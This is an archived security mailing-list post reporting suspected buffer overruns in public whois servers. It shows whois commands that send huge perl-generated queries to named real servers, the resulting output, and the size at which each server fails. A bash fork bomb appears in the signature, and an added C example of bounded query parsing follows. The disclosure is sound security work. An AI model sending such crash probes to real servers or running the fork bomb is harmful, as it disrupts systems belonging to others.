no comment

From: Michal Zalewski (lcamtufat_private)
Date: Wed Feb 02 2000 - 04:29:07 PST

    In the following example (which works only with the Linux version of the 'whois'
    command - the *BSD version has built-in query size limits), replace
    joshua.ripe.net with your favourite - whois.arin.net or whois.radb.net...
    
    [lcamtuf@www lcamtuf]$ whois `perl -e '{print "0." x 10000}'`@joshua.ripe.net
    [joshua.ripe.net]
    
    % Rights restricted by copyright. See http://www.ripe.net/ripencc/pub-services/db/copyright.html
    % No entries found for the selected source(s).
    %
    % If you would like to search on arbitrary strings,
    % please see the Database page on the RIPE NCC
    % web-site at http://www.ripe.net/ripencc/pub-services/db/
    % This will only work for RIPE data.
    %
    % Please note that RIPE whoisd service temporarily
    % does not mirror RADB and CW databases. Please query
    % these databases directly at:
    % whois.radb.net for RADB and
    % whois.cw.net for CW.
    
    [lcamtuf@www lcamtuf]$ whois `perl -e '{print "0." x 20000}'`@joshua.ripe.net
    [joshua.ripe.net]
    
    % Rights restricted by copyright. See http://www.ripe.net/ripencc/pub-services/db/copyright.html
    
    [lcamtuf@www lcamtuf]$
    
    For whois.arin.net and whois.radb.net, the 'magic point' is at about 248
    bytes of query sent. whois.ripe.net seems to panic with buffers larger than
    30k, but only with specific sequences (like "0.0.0"...). whois.cw.net can
    stand even 80-90kB before crashing sessions.
    
    I have no idea how to explain it - it seems just like a regular buffer overrun
    in whoisd started from inetd (as is suggested). But, of course, since we
    can't get the sources of the currently running services, it could be addressed as
    "silently dropping excessive data portions with a system-dependent data amount
    limit". Only one thing is mysterious - the whoisd service produces verbose
    output on any query syntax error or any other problem, except for that.
    And the RFC doesn't mention a maximal query length nor _any_ situation when the
    connection should be silently dropped.  That's another reason to think
    whoisd crashed.
    
    _______________________________________________________
    Michal Zalewski * [lcamtufat_private] <=> [AGS WAN SYSADM]
    [dione.ids.pl SYSADM] <-> [http://lcamtuf.na.export.pl]
    [+48 22 813 25 86] [+48 603 110 160] bash$ :(){ :|:&};:
    =-----=> God is real, unless declared integer. <=-----=
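As an added illustration of the behaviour the post says a whois server should have (a bounded read of the query line plus a verbose "%" error instead of a silent disconnect), here is a hypothetical C handler; it is not code from the original post or from any whoisd, and the 256-byte limit, the function names and the constructed "0." sample queries are assumptions.

```c
/* Added example, not from the original post or any whoisd source: a bounded
 * reader for one whois query line (RFC 954: text terminated by CRLF). The
 * limit below is an assumed policy value, not any real server's. */
#include <stdio.h>
#include <string.h>
#define WHOIS_MAX_QUERY 256          /* assumed limit */

enum query_status { QUERY_OK = 0, QUERY_TOO_LONG, QUERY_NO_TERMINATOR };

/* Copy the query line from `in` (in_len bytes, need not be NUL-terminated)
 * into `out` (out_cap bytes, always NUL-terminated on return). Never reads
 * past in_len or writes past out_cap: an oversized query becomes an
 * explicit status instead of an overrun of a fixed-size buffer. */
enum query_status read_whois_query(const char *in, size_t in_len,
                                   char *out, size_t out_cap)
{
    size_t n, limit;
    if (out_cap == 0) return QUERY_TOO_LONG;
    limit = out_cap - 1;                 /* keep room for the NUL */
    if (limit > WHOIS_MAX_QUERY) limit = WHOIS_MAX_QUERY;
    for (n = 0; n < in_len; n++) {
        if (in[n] == '\r' || in[n] == '\n') { out[n] = '\0'; return QUERY_OK; }
        if (n >= limit) { out[0] = '\0'; return QUERY_TOO_LONG; }
        out[n] = in[n];
    }
    out[0] = '\0';
    return QUERY_NO_TERMINATOR;
}

/* Verbose RIPE-style "%" comment for a rejected query, so the client sees a
 * reason rather than the silent disconnect the post finds suspicious. */
int format_query_error(enum query_status st, char *buf, size_t cap)
{
    if (st == QUERY_TOO_LONG)
        return snprintf(buf, cap, "%% Query longer than %d bytes rejected\r\n", WHOIS_MAX_QUERY);
    if (st == QUERY_NO_TERMINATOR)
        return snprintf(buf, cap, "%% Query line not terminated\r\n");
    return 0;
}

/* Demo: constructed "0." x repeats query, like the post's perl one-liner. */
static char demo_out[512], demo_err[128];
enum query_status demo_parse_repeated(size_t repeats)
{
    static char sample[1 << 16];
    size_t i, n = 0;
    for (i = 0; i < repeats && n + 4 <= sizeof sample; i++) { sample[n++] = '0'; sample[n++] = '.'; }
    sample[n++] = '\r'; sample[n++] = '\n';
    return read_whois_query(sample, n, demo_out, sizeof demo_out);
}
```

With these assumptions a query of exactly 256 bytes is accepted, a 258-byte one is rejected with an explicit message, and the 20000-byte "0." query from the post never reaches a fixed-size copy.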
    
    This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:32:59 PDT